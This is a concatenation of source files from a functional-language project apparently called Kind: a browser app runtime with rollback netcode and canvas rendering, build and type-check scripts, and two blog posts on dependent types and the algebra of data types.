document.body.addEventListener("mousedown", this.listeners.mousedown);
this.listeners.mouseover = (e) => {
this.register_event({
_: "App.Event.mouse_over",
time: BigInt(Date.now()),
id: e.target.id
});
};
document.body.addEventListener("mouseover", this.listeners.mouseover);
this.listeners.click = (e) => {
this.register_event({
_: "App.Event.mouse_click",
time: BigInt(Date.now()),
id: e.target.id
});
};
document.body.addEventListener("click", this.listeners.click);
// Mouse up event
this.listeners.mouseup = (e) => {
this.register_event({
_: "App.Event.mouse_up",
time: BigInt(Date.now()),
});
};
document.body.addEventListener("mouseup", this.listeners.mouseup);
// Key down event
this.listeners.keydown = (e) => {
if (!e.repeat) {
this.register_event({
_: "App.Event.key_down",
time: BigInt(Date.now()),
code: e.keyCode,
});
}
};
document.body.addEventListener("keydown", this.listeners.keydown);
// Key up event
this.listeners.keyup = (e) => {
this.register_event({
_: "App.Event.key_up",
time: BigInt(Date.now()),
code: e.keyCode,
});
};
document.body.addEventListener("keyup", this.listeners.keyup);
// Tick event
this.intervals.tick = () => {
setInterval(() => {
this.register_tick(window.KindEvents.get_tick())
}, 1000 / 60);
};
this.intervals.tick()
// Frame event (60 fps)
this.intervals.frame = () => {
setInterval(() => {
this.register_event({
_: "App.Event.frame",
time: BigInt(Date.now()),
info: {
_: "App.EnvInfo.new",
screen_size: {
_: "Pair.new",
fst: screen.width,
snd: screen.height,
},
mouse_pos: this.mouse_pos,
}
})
}, 1000 / 60);
};
this.intervals.frame()
}
// Initializes the main render loop
async init_renderer() {
if (DEBUG_SHOW_FPS) {
var last_time = Date.now();
var fps_count = 0;
}
this.intervals.renderer = setInterval(() => {
if (this.app) {
if (DEBUG_SHOW_FPS) {
if (Date.now() - last_time > 1000) {
//console.log("FPS: ", fps_count);
fps_count = 0;
last_time = Date.now();
}
fps_count++;
}
this.rendered = this.app.draw(this.app_state);
this.forceUpdate();
}
}, 1000 / 32);
}
// Adds an event to the list of events
register_event(ev) {
if (this.app) {
this.run_io(this.app.when(ev)(this.app_state));
}
}
// Registers a post
register_post(post) {
if (this.app && this.watching[post.room]) {
var key = String(post.tick);
if (!this.app_global_posts[key]) {
this.app_global_posts[key] = [];
}
this.app_global_posts[key].push(post);
// console.log("New post at " + this.show_tick(post.tick));
if (!this.app_global_begin || post.tick < this.app_global_begin) {
this.app_global_begin = post.tick;
this.app_global_states = null;
this.app_global_tick = null;
}
this.register_tick(post.tick);
//console.log(this.app_global_posts);
//console.log(this.app_global_begin);
}
}
show_tick(tick){
return (new Date(tick * 62.5)).toUTCString();
}
// Computes the global state at given tick (rollback netcode)
register_tick(tick) {
var restored = false;
if (this.app && this.app_global_begin !== null) {
// If the tick is older than the current state, rollback
if (this.app_global_tick !== null && tick < this.app_global_tick) {
//console.log("- older than " + this.app_global_tick);
var latest = StateList.latest(tick, this.app_global_states);
// If there is no previous state, reset to initial state
if (latest === null) {
this.app_global_tick = null;
this.app_state.global = this.app.init.global;
// Otherwise, restore found state
} else {
restored = true;
this.app_global_tick = latest.tick;
this.app_state.global = latest.state;
}
}
if (this.app_global_tick === null) {
//console.log("- init app_global_tick");
this.app_global_tick = this.app_global_begin;
}
var count_ticks = 0;
var count_posts = 0;
var begin_time = Date.now();
var total = tick - this.app_global_tick;
if (total > 16 && this.app_has_ticker) {
var from_date = new Date(this.app_global_tick * 62.5);
var to_date = new Date(tick * 62.5);
this.display = "Computing " + total + " ticks.\n";
this.display += "From : " + from_date.toUTCString().slice(5) + "\n";
this.display += "UpTo : " + to_date.toUTCString().slice(5) + "\n";
this.forceUpdate();
}
// amount of ticks done after one post
var tick_limit = 16 * 64;
if (restored) {
// posts between latest state and actual tick
var post_ticks = [];
// post before latest state
// used to redo ticks between latest and first restored post
var immediately_before = undefined;
for (let key in this.app_global_posts) {
let n_key = Number(key)
// finding which posts restore
if (n_key > this.app_global_tick) post_ticks.push(n_key);
else
// find post immediately before latest state
if (n_key > immediately_before || immediately_before === undefined)
immediately_before = n_key;
}
// order posts
post_ticks.sort();
// do ticks between latest state and first post restored
if (immediately_before) {
var compute_from_tick = this.app_global_tick;
var compute_to_tick = Math.min(this.app_global_tick
+ (tick_limit - (this.app_global_tick - immediately_before)), post_ticks[0]);
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
this.execute(t);
}
}
// restore posts and their ticks between latest state and actual tick
for (var j = 0; j < post_ticks.length - 1 ; j++) {
var until = Math.min(post_ticks[j + 1] - post_ticks[j], tick_limit);
var compute_from_tick = post_ticks[j];
var compute_to_tick = compute_from_tick + until;
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
this.execute(t);
}
}
} else {
var compute_from_tick = this.app_global_tick;
var compute_to_tick = Math.min(compute_from_tick + tick_limit, tick); // pauses after 16*64 ticks of no posts
for (var t = compute_from_tick; t < compute_to_tick; ++t) {
//++count_ticks;
this.execute(t);
};
}
this.display = null;
this.app_global_tick = tick;
//if (this.app_global_tick > (Date.now() - 1000) / 62.5) {
//console.log("At " + tick + "("+(compute_to_tick-compute_from_tick)+" computed)");
//}
}
}
// receives a timestamp and execute its posts and tick
execute(t) {
var posts = this.app_global_posts[String(t)];
var state = this.app_state.global;
if (posts) {
for (var i = 0; i < posts.length; ++i) {
var post = posts[i];
state = this.app.post(post.tick)(post.room)(post.addr)(post.data)(state);
}
}
if (this.app_has_ticker) {
state = this.app.tick(BigInt(t))(state);
}
this.app_global_states = StateList.push({tick: t+1, state}, this.app_global_states);
this.app_state.global = state;
}
// Resets the state and recomputes all posts
recompute_posts() {
this.app_global_states = null;
this.app_global_tick = null;
this.app_global_begin = null;
this.app_global_posts = {};
this.app_state.global = this.app.init.global;
for (var post of this.received_posts) {
//console.log("recompute post: " + JSON.stringify(post));
this.register_post(post);
}
}
// Performs an IO computation
run_io(io) {
//console.log("hmmm", io);
switch (io._) {
case "IO.end":
switch (io.value._) {
case "Maybe.none":
return Promise.resolve(null);
case "Maybe.some":
this.app_state.local = io.value.value;
return Promise.resolve(io.value.value);
}
break;
case "IO.ask":
// console.log("IO.ask", io);
return new Promise((res, err) => {
switch (io.query) {
case "print":
alert(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "put_string":
alert(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "get_time":
return this.run_io(io.then(String(Date.now()))).then(res).catch(err);
case "get_line":
var answer = prompt(io.param) || "";
return this.run_io(io.then(answer)).then(res).catch(err);
case "get_file":
var data = localStorage.getItem(io.param) || "";
return this.run_io(io.then(data)).then(res).catch(err);
case "set_file":
var path = '';
for (var i = 0; i < io.param.length && io.param[i] !== '='; ++i) {
path += param[i];
};
var data = io.param.slice(i + 1);
localStorage.setItem(path, data);
return this.run_io(io.then("")).then(res).catch(err);
case "del_file":
localStorage.removeItem(io.param);
return this.run_io(io.then("")).then(res).catch(err);
case "request":
return fetch(encodeURI(io.param))
.then(result => result.text())
.then(result => this.run_io(io.then(result)))
.then(res)
.catch(err => {
let msg = err.message;
let call_fix = ".\nLet us know ..."; // TODO: add call to Github issue
this.run_io(io.then("Oops, something went wrong: "+ msg + call_fix))
});
case "unwatch":
if (utils.is_valid_hex(64, io.param)) {
this.watching[io.param] = false;
window.KindEvents.unwatch_room(io.param);
this.recompute_posts();
} else {
// console.log("Error: invalid input on App.Action.unwatch");
}
return this.run_io(io.then("")).then(res).catch(err);
case "watch":
if (utils.is_valid_hex(64, io.param)) {
//console.log('watch', io.param);
this.watching[io.param] = true;
window.KindEvents.watch_room(io.param);
this.recompute_posts();
window.KindEvents.on_post(({ room, tick, addr, data }) => {
var tick = parseInt(tick, 16);
this.register_post({room,tick,addr,data});
this.received_posts.push({room,tick,addr,data});
//this.register_event({ _: "App.Event.post", time, room, addr : addr, data });
});
} else {
// console.log("Error: invalid input on App.Action.watch");
}
return this.run_io(io.then("")).then(res).catch(err);
case "post":
var [room, data] = io.param.split(";");
if (utils.is_valid_hex(64, room) && utils.is_valid_hex(null, data)) {
window.KindEvents.send_post(room, data);
} else {
// console.log("Error: invalid input on App.Action.post");
}
return this.run_io(io.then("")).then(res).catch(err);
}
});
}
}
// Renders a document
render_dom(elem) {
//console.log("render_dom", elem);
switch (elem._) {
// Renders a HTML element
case "DOM.node":
let props = utils.map_to_object(elem.props);
let style = utils.map_to_object(elem.style);
return h(elem.tag, {
...props,
style: style,
onInput: (event) => {
if (elem.tag === "input" || elem.tag === "textarea") {
let time = BigInt(Date.now());
this.register_event({_: "App.Event.input", time, id: props.id, text: event.target.value});
}
},
}, utils.list_to_array(elem.children).map(x => this.render_dom(x)));
// Renders a VoxBox using a canvas
case "DOM.vbox":
let canvas_props = utils.map_to_object(elem.props);
let canvas_style = utils.map_to_object(elem.style);
var id = canvas_props ? canvas_props.id || "" : "";
var width = Number(canvas_props.width) || 256;
var height = Number(canvas_props.height) || 256;
var scale = Number(canvas_props.scale) || 1;
var canvas = this.get_canvas(id, width, height, scale);
var length = elem.value.length;
var capacity = elem.value.capacity;
var buffer = elem.value.buffer;
// Renders pixels to buffers
for (var i = 0; i < length; ++i) {
var pos = buffer[i * 2 + 0];
var col = buffer[i * 2 + 1];
var p_x = (pos >>> 0) & 0xFFF;
var p_y = (pos >>> 12) & 0xFFF;
var p_z = (pos >>> 24) & 0xFF;
var idx = p_y * canvas.width + p_x;
var dep = canvas.depth_u8[idx];
if (p_x >= 0 && p_x < width && p_y >= 0 && p_y < height && p_z >= dep) {
canvas.image_u32[idx] = col;
canvas.depth_u8[idx] = p_z;
canvas.clear.data[canvas.clear.length++] = idx;
}
}
// Renders buffers to canvas
canvas.image_data.data.set(canvas.image_u8);
canvas.context.putImageData(canvas.image_data, 0, 0);
// Erases pixels from buffers
for (var i = 0; i < canvas.clear.length; ++i) {
var idx = canvas.clear.data[i];
canvas.image_u32[idx] = 0;
canvas.depth_u8[idx] = 0;
}
canvas.clear.length = 0;
// Mutably resets the length of the VoxBox
elem.value.length = 0;
return h("div", {
ref: function (x) { if (x) { x.appendChild(canvas) } }
});
// Renders plain text
case "DOM.text":
return elem.value;
}
}
// Component's render function
render() {
if (!this.app) {
return "Loading app...";
} else if (!this.rendered) {
return "Rendering app...";
} else if (this.display) {
return h("pre",
{
id: "container",
style: {
"width": "100%",
"height": "100%",
"display": "flex",
"justify-content": "center",
"align-items": "center",
},
},
[this.display]);
} else {
return h("div",
{
id: "container",
style: {
"width": "100%",
"height": "100%",
},
},
this.render_dom(this.rendered));
}
}
// remove canvas element
// used to avoid creation of infinite canvas
remove_canvas(id) {
let element =
id ?
document.getElementById(id) :
document.querySelector("canvas")
if (element) element.remove();
}
// Gets a pixel-art canvas
get_canvas(id, width, height, scale=1) {
if (!this.canvas[id] || this.canvas[id].width !== width || this.canvas[id].height !== height) {
// console.log("creating canvas", id, width, height);
this.remove_canvas(id);
this.canvas[id] = document.createElement("canvas");
this.canvas[id].id = id;
this.canvas[id].classList.add("pixel-art");
this.canvas[id].width = width;
this.canvas[id].height = height;
this.canvas[id].style.width = (width*scale) + "px";
this.canvas[id].style.height = (height*scale) + "px";
this.canvas[id].clear = { length: 0, data: new Uint32Array(width * height * 32) };
//this.canvas[id].style.border = "1px solid black";
this.canvas[id].context = this.canvas[id].getContext("2d");
this.canvas[id].image_data = this.canvas[id].context.getImageData(0, 0, this.canvas[id].width, this.canvas[id].height)
this.canvas[id].image_buf = new ArrayBuffer(this.canvas[id].image_data.data.length);
this.canvas[id].image_u8 = new Uint8ClampedArray(this.canvas[id].image_buf);
this.canvas[id].image_u32 = new Uint32Array(this.canvas[id].image_buf);
this.canvas[id].depth_buf = new ArrayBuffer(this.canvas[id].image_u32.length);
this.canvas[id].depth_u8 = new Uint8Array(this.canvas[id].depth_buf);
}
return this.canvas[id];
}
}
<file_sep>/web/events/example.js
var client = require("./client.js");
var api = client({
//url: "ws://uwu.tech:7171",
url: "ws://localhost:7171",
key: "0000000000000000000000000000000000000000000000000000000000000001",
});
// When connected, watches room 0 and makes an example post.
api.on_init(() => {
var room = "1234000000004321";
var post = "01020304";
// Watches the room
api.watch_room(room);
// Posts a 256-bit message to it
//api.send_post(room, post);
function print_time() {
//console.clear();
console.log("local_time : ", Date.now());
console.log("server_time : ", api.get_time());
console.log("delta_time : ", Date.now() - api.get_time());
console.log("");
}
print_time()
setInterval(print_time, 1000);
});
// When there is a new posts, print all posts we have recorded.
api.on_post((post, Posts) => {
//console.clear();
console.log(JSON.stringify(post));
//console.log(JSON.stringify(Posts, null, 2));
});
<file_sep>/web/build.js
// Compiles apps from `Kind/base/App/*.kind to `src/apps/*.js`
var fs = require("fs");
var {exec, execSync} = require("child_process");
require('dotenv/config');
var code_dir = __dirname+"/src";
var kind_dir = __dirname+"/../base";
// TODO: remove from "src/apps" the ones that are no longer in "base/Apps"
process.chdir(kind_dir);
var all_kind_apps = fs.readdirSync("App").filter(x => x.slice(-5) === ".kind");
var all_js_apps = [];
// console.log(all_kind_apps)
// App that will be displayed when accessing http://uwu.tech
var server_apps = [
'Browser.kind',
'Hello.kind',
'Kind.kind',
'KL.kind',
'Playground.kind',
'Pong.kind',
'Seta.kind',
'TicTacToe.kind'
]
var app = "";
var compiled_apps = [];
console.log("[1/2] Compiling apps:")
const build_server = process.env.PRODUCTION;
if (process.argv[2]) { // Only build 1 App
app = all_kind_apps.filter(name => {
const match = process.argv[2].toLowerCase()
return name.toLowerCase().endsWith(match)
|| name.toLowerCase().endsWith(match+".kind");
})[0];
if (app) {
compiled_apps = compile_app(app);
} else {
console.log("[error] App "+process.argv[2]+" not found.");
}
} else { // Build all Apps
console.log("Tip: to build only 1 app, use \x1b[2mnode build.js app_name\x1b[0m.")
const apps = build_server ? server_apps : all_kind_apps;
for (var file of apps) {
compiled_apps.push(compile_app(file));
}
}
// Compile app from ".kind" to ".js"
// Save it in "src/apps/"
function compile_app(name) {
all_js_apps.push("App."+name.replace(".kind",".js"));
process.chdir(kind_dir);
var name = "App."+name.slice(0,-5);
console.log("- " + name);
try {
var code = String(execSync("kind "+name+" --js --module | js-beautify", {maxBuffer: 1024 * 1024 * 1024}));
} catch (e) {
console.log("Couldn't compile " + file + ". Error:");
console.log(e.toString());
}
// Write compiled App file
process.chdir(code_dir);
fs.writeFileSync("apps/"+name+".js", code);
return name;
}
// Write "src/app/index.js" to export the Apps
process.chdir(code_dir);
var index = "module.exports = {\n";
const add_line = (app) => " '" + app.slice(0, -3) + "': import('./"+app+"'),\n";
if (app !== "" && app !== undefined) { // Check if need to add App to the export list
const app_export_format = "App."+app.slice(0,-5)+".js";
if (all_js_apps.includes(app_export_format)) all_js_apps.concat(app_export_format);
}
const formatted_server_app = (app) => app.slice(4).slice(0, -3) + ".kind";
// Define which Apps will be on index.js file
const apps_in_index =
build_server
? all_js_apps.filter((app) => server_apps.includes(formatted_server_app(app)))
: all_js_apps;
// Order Apps alphabetically
apps_in_index.sort((a, b) => a.localeCompare(b))
for (var app of apps_in_index ) {
index += add_line(app);
}
index += "}\n";
fs.writeFileSync("apps/index.js", index);
console.log("\n[2/2] Building index.js...");
exec("npm run build", function (err, stdout, stdin) {
if (err) {
console.log(err);
} else {
console.log("Done.");
}
})
<file_sep>/web/src/utils.js
function is_valid_hex(bits, hex) {
if (bits) {
return new RegExp("^[0-9A-Fa-f]{"+Math.floor(bits/4)+"}$").test(hex)
} else {
return new RegExp("^[0-9A-Fa-f]*$").test(hex)
}
}
function list_to_array(list) {
var arr = [];
while (list._ === "List.cons") {
arr.push(list.head);
list = list.tail;
}
return arr;
}
function map_to_object(map, obj = {}) {
switch (map._) {
case "BBT.bin":
obj[map.key] = map.val;
map_to_object(map.left, obj);
map_to_object(map.right, obj);
break;
case "BBT.tip":
break;
}
return obj;
}
// function bits_to_string(bits) {
// var str = "";
// for (var i = 0; i < bits.length; i += 16) {
// var binary = bits.slice(i, i + 16).split("").reverse().join("");
// str += String.fromCharCode(parseInt(binary, 2));
// }
// return str;
// }
module.exports = {
is_valid_hex,
list_to_array,
map_to_object,
// bits_to_string,
}
<file_sep>/blog/2-first-class-modules-with-self-types.md
First class modules with self types
===================================
Sometimes, heterogeneous data types are desirable, even in a strongly typed
language. For example, first-class modules could be represented as maps from
strings to functions. The problem is, the type of these functions may vary:
```
IntLib.add(a: Int, b: Int): Int
a + b
IntLib.neg(a: Int): Int
0 - a
IntLib: Module
{
"add": Dynamic.new!(IntLib.add) // Int -> Int -> Int
"neg": Dynamic.new!(IntLib.neg) // Int -> Int
}
five: Int
Module.value_of(IntLib, "add")(+2, +3)
```
So how can we represent the `Module` type? Neither `Map<Int -> Int -> Int>` nor
`Map<Int -> Int>` would work, since `add` and `neg` have different types.
Creating a sum type with every possible type of function wouldn't be viable,
either. There is no escape: sometimes we just need a way to talk about dynamic
values, even though we're in a statically typed language.
## The Dynamic type in Agda
In a dependently typed language, one way to have this is to implement a
`Dynamic` type, which is a pair of `type, value`:
```
data Dynamic : Set where
new : (T : Set) -> (value : T) -> Dynamic
```
This datatype is like a box that "hides" a value and its type internally, but is
itself viewed as a single type, called `Dynamic`. This, in turn, allows us to
create collections of types that vary. For example, we may store ints and
strings in the same `List Dynamic`:
```
elems : List Dynamic
elems = [new Int 3, new String "foo"]
```
We can also make functions to extract the type and the value of a `Dynamic`:
```
typeOf : Dynamic -> Set
typeOf (new T value) = T
valueOf : (dyn : Dynamic) -> typeOf dyn
valueOf (new T value) = value
```
And we can use `valueOf` to recover a typed value from a "static dynamic":
```
dyn : Dynamic
dyn = new Int 7
num : Int
num = valueOf dyn
```
Of course, we can only turn a `Dynamic` into a well-typed value if it has a
statically known type. Otherwise, it becomes useless, since we won't be able to
do anything with it (after all, `Int` functions work on `Int` arguments, not `Dynamic`
arguments, for example). But for first-class modules, `Dynamic` is very handy,
since we're always able to cast module functions to their actual types.
## The Dynamic type in Kind, with Self types
If we blindly translate the program above to Kind, this is what we get:
```
type Dynamic {
new<T: Type>(value: T)
}
Dynamic.type_of(dyn: Dynamic): Type
case dyn {
new: dyn.T
}
Dynamic.value_of(dyn: Dynamic): Dynamic.type_of(dyn)
case dyn {
new: dyn.value
}
dyn: Dynamic
Dynamic.new<Nat>(7)
num: Nat
case dyn {
new: dyn.value
}
```
Unlike Agda (which does a lot under the hoods), Kind is a more raw language,
that desugars the syntax above to a very simple core calculus. Because of that,
this program, as is, doesn't type check, since Kind isn't able to tell that the
`T` field of `dyn` is equal to `Nat`, even though that's the case, since `dyn`
is a static value. To solve this, we must get our hands dirty and hack the self
types directly. First, we use `kind <term> --show` to recover the Self encoding
for the `Dynamic` type, and its constructor:
```
$ kind Dynamic --show
Dynamic.Self<P:(:Dynamic) Type> (new:<T:Type> (value:T) P(Dynamic.new(T,value))) P(Dynamic.Self)
$ kind Dynamic.new --show
(T) (value) (P) (new) new(T,value)
```
Then, we replace the `type Dynamic { ... }` syntax sugar by the terms above:
```
Dynamic: Type
self<P: Dynamic -> Type>
(new: <T: Type> (value: T) P(Dynamic.new(T, value)))
P(self)
Dynamic.new<T: Type>(value: T): Dynamic
(P, new) new(T,value)
```
I must stress that this program is identical to the previous one, we've just
written the Self encoding directly instead of letting the `type Dynamic { ... }`
syntax desugar to it. Now, we hack it by making one small change: we replace
`value : T` in the `new` constructor by `value : type_of(self)`. That's because
`T` is the first field of `self`, so both are equivalent:
```
Dynamic: Type
self<P: Dynamic -> Type>
(new: <T: Type> (value: Dynamic.type_of(self)) P(Dynamic.new(Dynamic.type_of(self), value)))
P(self)
Dynamic.new<T: Type>(value: T): Dynamic
(P, new) new(T,value)
```
This should work in any language with self types. Since not every reader is
familiar with Kind's syntax, here is the same code in an Agda-like syntax:
```
Dynamic : Set
Dynamic =
∀ self (P : Dynamic -> Set) ->
∀ (new : (T : Type) -> (value : typeOf self) -> P (new (typeOf self) value)) ->
P self
new : (T : Set) -> (value : T) -> Dynamic
new T value = \ P new -> new T value
```
With this small change, we're now able to extract values of static dynamics just
like in Agda. In other words, the following program type-checks just fine:
```
dyn: Dynamic
Dynamic.new<Nat>(7)
dyn: Nat
case dyn {
new: dyn.value
}
```
With this, we're able to represent first-class modules in Kind. The `Dynamic`
and `Module` modules are already on base. Kind users can already use first-class
modules in their codes, and the first snippet in this post works as is!
As a last thought, I wonder if, in a future, we should desugar the `type`
syntax in a way that does this automatically. I see no reason not to, but
it would increase the complexity of the desugarer considerably.
<file_sep>/web/type_check_Apps.js
var fs = require("fs");
var { execSync } = require("child_process");
var kind_dir = __dirname+"/../base";
process.chdir(kind_dir);
var all_kind_apps = fs.readdirSync("App").filter(x => x.slice(-5) === ".kind");
const args = process.argv[2];
if (args) {
let app = args.slice(5); // remove "base/"
if (process.argv[2].trim() === "all") { // node type_check_Apps all
exit_all(type_check_apps());
} else { // node type_check_Apps App/[name]
if (app) {
is_folder(app)
? exit(type_check_folder(get_app_folder(app)))
: exit(type_check_app(app));
} else {
console.log("Invalid parameter");
exit(false);
}
}
} else {
console.log("A parameter must be specified.");
console.log("- node type_check_Apps App.[name]");
console.log("- node type_check_Apps all");
}
function is_folder(path) {
let folders = path.split("/");
console.log(folders)
return (folders.length > 1) && (!folders[1].endsWith(".kind"));
}
function get_app_folder(path) {
return path.split("/")[1];
}
function exit(success) {
if (success) {
console.log("\x1b[32msuccess\x1b[39m\n")
process.exit();
} else {
console.error("\x1b[31mfail\x1b[39m\n");
process.exit(1);
}
}
// Exit from type checking all Apps' folder
// Show the ones with error
function exit_all(res) {
if (res["fail"].lenght === 0) {
console.log("\x1b[32msuccess\x1b[39m\n")
process.exit();
} else {
console.log("Found error in folders: ", res["fail"]);
console.error("\x1b[31mfail\x1b[39m\n");
process.exit(1);
}
}
// Type check an App in base/App
// ex: node type_check_Apps App/Playground.kind
function type_check_app(name) {
console.log("Type checking "+name+"...")
const type_check = execSync('kind '+ name, function (error, stdout, stderr) {
if (error) {
console.log(error.stack);
return false;
}
console.log('type check STDOUT: '+stdout);
});
let match = String(type_check).slice(-17, -1); // mensage in the end of the type check process
return match.endsWith("All terms check.");
}
// Type check an App's folder in base/App
// all_apps: when false, uses JavaScript compilation target. If true, Scheme.
// ex: node type_check_Apps App/Playground/
function type_check_folder(name, all_apps = false) {
if (fs.existsSync(kind_dir+"/App/"+name)) {
try {
console.log("Type checking folder App/"+name+"/* ...");
var target = all_apps ? "kind-scm" : "kind";
const type_check = execSync(target+' App/'+ name +"/", function (error, stdout, stderr) {
if (error) {
console.log(error.stack);
return false;
}
console.log('type check STDOUT: '+stdout);
});
let match = String(type_check).slice(-17, -1); // mensage in the end of the type check process
return match.endsWith("All terms check.");
} catch (e) {
console.log(e);
return false;
}
} else {
if (all_kind_apps.includes(name+".kind")) {
return true; // it's an App without folder
} else {
console.log("Couldn't find folder App/"+name);
return false;
}
}
}
// Type check all apps
// IMPORTANT: it will not work if the compilation target isn't Scheme.
function type_check_apps() {
const success = [];
const fail = [];
for (var file of all_kind_apps) {
var app = file.slice(0, -5);
type_check_app("App."+app) ? success.push(file) : fail.push(file);
type_check_folder(app, true) ? success.push(app) : fail.push(app);
}
return {success, fail}
}
module.exports = { type_check_folder, is_folder };<file_sep>/blog/4-funcional-alquimista.md
Funcional Alquimista
====================
O Haskell e outras linguagens funcionais usam tipos algébricos, declarados com a sintaxe "data":
```
data Bool = True | False
data Jokenpo = Rock | Paper | Scissor
data Pair x = MakePair x x
data Maybe x = Nothing | Just x
data Nat = Zero | Succ Nat
data List x = Nil | Cons x (List x)
data Tree x = Empty | Branch x (List (Tree x))
```
Se você não entende o que está acontecendo acima, o resto não vai fazer sentido (e tudo bem); nesse caso, recomendo ler algum tutorial de Haskell caso ainda tenha interesse nesse post. Se as linhas acima fazem sentido para você, continue lendo, pois lhe contarei a história de um alquimista funcional que foi longe demais.
Era uma linda tarde de sol, quando um alquimista funcional, como outro qualquer, se perguntou a pergunta que todos fazemos um dia: "se tipos funcionais são chamados algébricos... por que não escrevemos eles como equações algébricas?" Sem saber que essa pergunta lhe levaria a um caminho sem volta que tangeria a porta da verdade, o pobre alquimista pegou um giz e, em seu já desgastado quadro negro, escreveu a seguinte equação:
```
Bool = 1 + 1
```
Em sua cabeça, isso fez sentido, porque Bool é um tipo soma, que pode ter dois valores: True e False. Na linha abaixo, ele escreveu:
```
Jokenpo = 1 + 1 + 1
```
Isso também fez sentido, porque existem 3 movimentos no Jokenpo: Rock, Paper, Scissor. Até aí, tudo parecia uma brincadeira inocente. Mas foi na próxima linha que as coisas começaram a ficar... interessantes. Se tipos soma são representados por uma adição, então tipos produto só podem ser representados com...
```
Pair x = x * x
```
Uma multiplicação! Mas isso realmente funciona? Vamos verificar: de acordo com essa equação, o tipo `Pair Jokenpo Jokenpo` deveria ter um total de `(1 + 1 + 1) * (1 + 1 + 1) = 3 * 3 = 9`, elementos. Vamos contar:
```
(Rock, Rock)
(Rock, Paper)
(Rock, Scissor)
(Paper, Rock)
(Paper, Paper)
(Paper, Scissor)
(Scissor, Rock)
(Scissor, Paper)
(Scissor, Scissor)
```
NANI!? Não pode ser. Será? Na linha abaixo, ele escreveu:
```
Maybe x = 1 + x
```
De acordo com essa equação, o tipo `Maybe Bool` deveria ter `1 + 2 = 3` elementos. Vamos contar:
```
Nothing
Just True
Just False
```
Caramba. Mas o que acontece com tipos infinitos?
```
Nat = 1 + Nat
```
Nesse caso, temos um loop:
```
Nat = 1 + 1 + Nat
Nat = 1 + 1 + 1 + Nat
Nat = 1 + 1 + 1 + 1 + ... Nat
```
O que reflete o fato que existem infinitos números naturais. Logo mais, ele descobriu que o mesmo vale para listas e árvores:
```
List x = 1 + x * List x
```
Pra visualizar essa equação, vamos primeiro contar a quantidade de elementos do tipo `List Bool`, para cada tamanho de lista:
List Bool de tamanho 0 tem 1 elemento:
```
[]
```
List Bool de tamanho 1 tem 2 elementos:
```
[True]
[False]
```
List Bool de tamanho 2 tem 4 elementos:
```
[True,True]
[True,False]
[False,True]
[False,False]
```
List Bool de tamanho 3 tem 8 elementos:
```
[True,True,True]
[True,True,False]
[True,False,True]
[True,False,False]
[False,True,True]
[False,True,False]
[False,False,True]
[False,False,False]
```
Ou seja, ao todo, List Bool tem um total de:
```
1 + 2 + 4 + 8 + 16 + ...
```
Elementos. Será que isso condiz com a equação acima? Vamos tentar aplicá-la:
```
List Bool = 1 + 2 * List Bool
List Bool = 1 + 2 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 * List Bool
List Bool = 1 + 2 + 4 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 + 8 * List Bool
List Bool = 1 + 2 + 4 + 8 * (1 + 2 * List Bool)
List Bool = 1 + 2 + 4 + 8 + 16 * List Bool
List Bool = ...
```
Uau! Nesse momento, o alquimista estava ciente de que havia encontrado algo realmente interessante. Ele estava à beira da porta da verdade, mas ainda havia tempo para voltar: virar de costas, fingir que aquela brincadeira nunca havia acontecido e levar uma vida normal e pacata. Mas o alquimia tinha sede por verdade, e não temia a inquisição. Então, com sangue nos olhos e as mãos tremendo, ele escreveu mais uma linha. Esta linha, eu lhes transcrevo na forma original:
```
d/dx Pair x = ?
```
Nesse momento, a porta da verdade se abriu.
```
d/dx Pair x =
d/dx (x * x) =
d/dx (x²) =
2x
```
Essa linha lhe disse que a derivada do tipo par, representado por "x * x", é o tipo representado por "x + x", ou seja:
```
data DeltaPair x = Fst x | Snd x
```
Mas qual seria a relação desse tipo, com o tipo par? O alquimista, perplexo, pensou por muito tempo, até formular a seguinte teoria: se a derivada de uma função algébrica é uma função capaz de focar em um ponto infinitesimal da função original, então, a derivada de um tipo algébrico deveria ser um tipo capaz de focar em um ponto do tipo original. Isso fez sentido. Afinal, se temos o par `(5, 7)`, então, podemos focar em dois elementos: o da esquerda, `(*, 7)`, ou o da direita, `(5, *)`. Esses dois pontos de foco podem ser representados pelo tipo DeltaPair, como `Fst 7` ou `Snd 5`, respectivamente. Para confirmar essa teoria, o alquimista tentou aplicar o mesmo ao tipo das listas, o que lhe demandou certa ingenuidade algébrica:
```
List x = 1 + x * List x
List x - x * List x = 1
List x * (1 - x) = 1
List x = 1 / (1 - x)
d/dx List x = d/dx 1 / (1 - x)
d/dx List x = 1 / (1 - x)²
d/dx List x = 1 / (1 - x) * 1 / (1 - x)
d/dx List x = List x * List x
data DeltaList x = Split (DeltaList x) (DeltaList x)
```
Isso nos indica que a derivada do tipo lista é nada mais do que duas listas. E isso também faz sentido, pois, para focar em um ponto de uma lista, precisamos de duas listas: uma com os elementos à esquerda do foco, e outra com os elementos à direita. Por exemplo, se criamos uma lista de 5 elementos, podemos focar no elemento do meio como: `[1, 2, *, 4, 5]`, o que pode ser representado pelo tipo `DeltaList` como `Split [1, 2] [4, 5]`.
Infelizmente, a verdade sobre a interligação entre tipos e equações algébricas foi poderosa demais até para o nosso bravo alquimista, que logo perdeu a sanidade e sumiu do mapa. Seu paradeiro, até hoje, é desconhecido, mas reza a lenda que ele ainda está entre nós, vagando por algum vilarejo pacato, comendo bananas radioativas e tentando derivar o tipo das monadas.
<file_sep>/web/src/StateList.js
// Adds a state to the list of states
// It only keeps log(N) states, where N is the amount of ticks recorded
function push(new_state, states) {
if (states === null) {
return {bit: 0, state: new_state, older: null};
} else {
var {bit, state, older} = states;
if (bit === 0) {
return {bit: 1, state, older};
} else {
return {bit: 0, state: new_state, older: push(state, older)};
}
}
}
// Finds the latest state that happened before a tick
function latest(before_tick, states) {
if (states === null) {
return null;
} else {
if (states.state.tick < before_tick) {
return states.state;
} else {
return latest(before_tick, states.older);
}
}
}
function show(states) {
if (states === null) {
console.log("END");
} else {
console.log((new Date(states.state.tick * 62.5)).toUTCString());
show(states.older);
}
}
module.exports = {
push,
latest,
show
};
<file_sep>/bin/bootstrap.js
var {execSync} = require("child_process");
var fs = require("fs");
var path = require("path");
var {fmc_to_js, fmc_to_hs, fmc} = require("formcore-js"); // FormCore, which has the JS compiler
